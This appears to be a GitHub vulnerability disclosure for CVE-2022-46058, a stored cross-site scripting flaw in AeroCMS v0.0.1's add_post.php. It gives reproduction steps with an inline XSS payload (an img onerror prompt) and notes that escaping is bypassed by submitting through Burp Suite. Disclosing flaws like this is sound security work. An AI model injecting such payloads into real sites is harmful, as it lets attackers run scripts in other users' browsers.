Headline
CVE-2022-46058: CVE/add_post_post_content.md at master · rdyx0/CVE
AeroCMS v0.0.1 was discovered to contain a cross-site scripting (XSS) vulnerability via add_post.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Comments text field.
Permalink
Cannot retrieve contributors at this time
add_post_post_content
AeroCMS v0.0.1 was discovered to contain a cross-site scripting (XSS) vulnerability via add_post.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Comments text field.
Step to Reproduct
- Login to admin panel -> Posts -> Add Posts -> Post Content -> inject payload <img/src/onerror=prompt(1)> -> The XSS will trigger when clicked Publish Post button
Exploit
Bypass escaping needs to be submitted using the Burp Suite
Click the View Post for the new submission